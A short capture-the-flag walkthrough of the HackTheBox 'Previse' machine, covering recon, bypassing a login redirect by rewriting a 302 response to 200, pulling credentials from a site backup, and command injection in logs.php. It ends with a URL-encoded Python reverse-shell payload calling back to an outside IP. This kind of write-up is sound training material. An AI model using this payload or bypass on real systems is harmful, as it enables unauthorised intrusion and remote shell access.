Previse hackthebox Walkthrough

Kapil Verma

4 min readJun 26, 2022

nmap scan.

Major port 22 ad 80, means 22 for SSH 80 for web application to find a foothold.

On web page we don’t find a lot again, so let’s burp it and see what’s going on.

From the dirbuster result we come across alot of webpages some of them were giving 200 but no actual useful data.

Upon clicking nav we get Accounts page which upon intercepting we see we’re getting 302, just a little trick here , modifying 302 to 200 gives me a page to create any user.

from here i can create any user and then login using those credentials.

Now from the dirbuster we found another url: files.php which gave me a download.php?file=32 url, well without actual login account we were not able to get to this url, it was continuouly asking me to login.

Well after creating a user as shown above then again tried to access that download.php?file=32 url and bingo, there’s some zip file.

Let’s unzip and see what does it contain.

Well i don’t find anything useful here.

Well, may be i was wrong, config.php had some juice in it.

Well now we have username and password for the MYSQL Database.

Okay well, reading all the files seriously now and I can see logs.php is using unsanitized user input to execute OS command may be we can use that to perform command injection.

Okay let’s get a python reverse shell payload.

python3+-c+’import+socket,os,pty%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((“10.10.14.34”,5858))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bpty.spawn(“/bin/sh”)